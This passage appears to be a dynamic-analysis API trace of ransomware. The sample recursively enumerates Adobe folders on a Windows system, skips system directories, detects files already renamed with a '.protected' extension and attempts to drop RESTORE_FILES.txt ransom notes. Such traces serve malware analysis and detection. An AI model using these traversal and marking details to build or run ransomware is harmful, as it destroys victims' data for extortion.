0x47b990 [0093.093] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.093] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.093] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.093] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.094] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.094] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\.") returned 30 [0093.094] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.094] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) 
returned 1 [0093.094] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.094] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.094] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.094] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.094] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.094] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\..") returned 31 [0093.094] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.094] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.094] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.094] lstrcmpiW (lpString1="Acrobat", lpString2="Windows") returned -1 [0093.094] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files") returned -1 [0093.094] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files (x86)") returned -1 [0093.094] lstrcmpiW (lpString1="Acrobat", lpString2="$Recycle.bin") returned 1 [0093.094] lstrcmpiW (lpString1="Acrobat", lpString2="System Volume Information") returned -1 [0093.094] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat") returned 36 [0093.094] lstrcmpW (lpString1="Acrobat", lpString2=".") returned 1 [0093.094] lstrcmpW (lpString1="Acrobat", lpString2="..") returned 1 [0093.094] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\*") returned 38 [0093.094] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.094] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.094] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.094] lstrcmpiW 
(lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.094] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.094] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.094] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\.") returned 38 [0093.094] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.094] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.094] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.094] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.094] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.094] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.094] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.094] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\..") returned 39 [0093.094] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.094] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.094] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.094] lstrcmpiW (lpString1="10.0", lpString2="Windows") returned -1 [0093.094] lstrcmpiW (lpString1="10.0", lpString2="Program Files") returned -1 [0093.095] lstrcmpiW (lpString1="10.0", lpString2="Program Files (x86)") returned -1 [0093.095] lstrcmpiW (lpString1="10.0", lpString2="$Recycle.bin") returned 1 [0093.095] lstrcmpiW (lpString1="10.0", lpString2="System Volume Information") returned -1 [0093.095] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0") returned 41 [0093.095] lstrcmpW (lpString1="10.0", lpString2=".") returned 1 [0093.095] lstrcmpW 
(lpString1="10.0", lpString2="..") returned 1 [0093.095] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\*") returned 43 [0093.095] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.095] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.095] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.095] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.095] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.095] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.095] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\.") returned 43 [0093.095] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.095] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.095] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.095] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.095] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.095] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.096] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.096] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\..") returned 44 [0093.096] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.096] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.096] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.096] lstrcmpiW (lpString1="Replicate", lpString2="Windows") returned -1 [0093.096] 
lstrcmpiW (lpString1="Replicate", lpString2="Program Files") returned 1 [0093.096] lstrcmpiW (lpString1="Replicate", lpString2="Program Files (x86)") returned 1 [0093.096] lstrcmpiW (lpString1="Replicate", lpString2="$Recycle.bin") returned 1 [0093.096] lstrcmpiW (lpString1="Replicate", lpString2="System Volume Information") returned -1 [0093.096] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate") returned 51 [0093.096] lstrcmpW (lpString1="Replicate", lpString2=".") returned 1 [0093.096] lstrcmpW (lpString1="Replicate", lpString2="..") returned 1 [0093.096] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*") returned 53 [0093.096] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.096] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.096] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.096] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.096] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.096] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.096] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\.") returned 53 [0093.096] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.096] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.096] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.096] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.096] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.096] lstrcmpiW 
(lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.096] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.096] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\..") returned 54 [0093.096] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.096] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.096] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.096] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.096] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.096] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.096] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.097] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.097] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\RESTORE_FILES.txt") returned 69 [0093.097] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.097] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.097] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.097] lstrcmpiW (lpString1="Security", lpString2="Windows") returned -1 [0093.097] lstrcmpiW (lpString1="Security", lpString2="Program Files") returned 1 [0093.097] lstrcmpiW (lpString1="Security", lpString2="Program Files (x86)") returned 1 [0093.097] lstrcmpiW (lpString1="Security", lpString2="$Recycle.bin") returned 1 [0093.097] lstrcmpiW (lpString1="Security", lpString2="System Volume Information") returned -1 [0093.097] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned 60 [0093.097] lstrcmpW (lpString1="Security", lpString2=".") returned 1 [0093.097] lstrcmpW (lpString1="Security", lpString2="..") returned 1 [0093.097] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*") returned 62 [0093.097] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.097] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.097] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.097] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.097] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.097] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.097] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\.") returned 62 [0093.097] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.097] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.097] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.097] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.097] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.097] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.097] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.097] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\..") returned 63 [0093.098] lstrcmpW (lpString1="..", 
lpString2=".") returned 1 [0093.098] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.098] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.098] lstrcmpiW (lpString1="directories.acrodata.protected", lpString2="Windows") returned -1 [0093.098] lstrcmpiW (lpString1="directories.acrodata.protected", lpString2="Program Files") returned -1 [0093.098] lstrcmpiW (lpString1="directories.acrodata.protected", lpString2="Program Files (x86)") returned -1 [0093.098] lstrcmpiW (lpString1="directories.acrodata.protected", lpString2="$Recycle.bin") returned 1 [0093.098] lstrcmpiW (lpString1="directories.acrodata.protected", lpString2="System Volume Information") returned -1 [0093.098] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.protected") returned 91 [0093.098] StrStrIW (lpFirst="directories.acrodata.protected", lpSrch=".protected") returned=".protected" [0093.098] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.098] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.098] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.098] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.098] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.098] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.098] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\RESTORE_FILES.txt") returned 78 [0093.098] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.098] lstrcmpW (lpString1="RESTORE_FILES.txt", 
lpString2="RESTORE_FILES.txt") returned 0 [0093.098] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.098] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.098] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\RESTORE_FILES.txt") returned 78 [0093.098] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.098] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.098] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.098] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\RESTORE_FILES.txt") returned 69 [0093.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.099] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.099] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.099] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.099] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.099] 
lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.099] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.099] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt") returned 59 [0093.099] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.099] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.099] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.099] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.100] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt") returned 59 [0093.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.100] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.100] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.100] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.100] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.100] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.100] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.100] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Adobe\\Acrobat\\RESTORE_FILES.txt") returned 54 [0093.100] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.100] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.100] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.100] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.100] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\RESTORE_FILES.txt") returned 54 [0093.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.101] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.101] lstrcmpiW (lpString1="ARM", lpString2="Windows") returned -1 [0093.101] lstrcmpiW (lpString1="ARM", lpString2="Program Files") returned -1 [0093.101] lstrcmpiW (lpString1="ARM", lpString2="Program Files (x86)") returned -1 [0093.101] lstrcmpiW (lpString1="ARM", lpString2="$Recycle.bin") returned 1 [0093.101] lstrcmpiW (lpString1="ARM", lpString2="System Volume Information") returned -1 [0093.101] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM") returned 32 [0093.101] lstrcmpW (lpString1="ARM", lpString2=".") returned 1 [0093.101] lstrcmpW (lpString1="ARM", lpString2="..") returned 1 [0093.102] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\*") returned 34 [0093.102] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\*", lpFindFileData=0x295ef20 | 
out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.102] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.102] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.102] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.102] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.102] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.102] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\.") returned 34 [0093.102] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.102] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.102] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.102] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.102] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.102] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.102] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.102] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\..") returned 35 [0093.102] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.102] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.102] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.102] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="Windows") returned -1 [0093.102] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="Program Files") returned 1 [0093.102] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="Program Files (x86)") returned 1 [0093.102] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="$Recycle.bin") returned 1 [0093.102] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="System Volume Information") 
returned -1 [0093.102] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0") returned 46 [0093.102] lstrcmpW (lpString1="Reader_10.0.0", lpString2=".") returned 1 [0093.102] lstrcmpW (lpString1="Reader_10.0.0", lpString2="..") returned 1 [0093.103] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*") returned 48 [0093.103] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.103] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.103] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.103] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.103] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.103] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.103] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\.") returned 48 [0093.103] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.103] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.103] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.103] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.103] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.103] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.103] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.103] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\..") returned 49 [0093.103] lstrcmpW (lpString1="..", 
lpString2=".") returned 1 [0093.103] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.103] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.104] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.protected", lpString2="Windows") returned -1 [0093.104] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.protected", lpString2="Program Files") returned -1 [0093.104] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.protected", lpString2="Program Files (x86)") returned -1 [0093.104] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.protected", lpString2="$Recycle.bin") returned 1 [0093.104] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.protected", lpString2="System Volume Information") returned -1 [0093.104] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.protected") returned 79 [0093.104] StrStrIW (lpFirst="AdbeRdrSecUpd10111.msp.protected", lpSrch=".protected") returned=".protected" [0093.104] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.protected", lpString2="Windows") returned -1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.protected", lpString2="Program Files") returned -1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.protected", lpString2="Program Files (x86)") returned -1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.protected", lpString2="$Recycle.bin") returned 1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.protected", lpString2="System Volume Information") returned -1 [0093.104] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.protected") returned 80 [0093.104] StrStrIW (lpFirst="AdbeRdrUpd10110_MUI.msp.protected", 
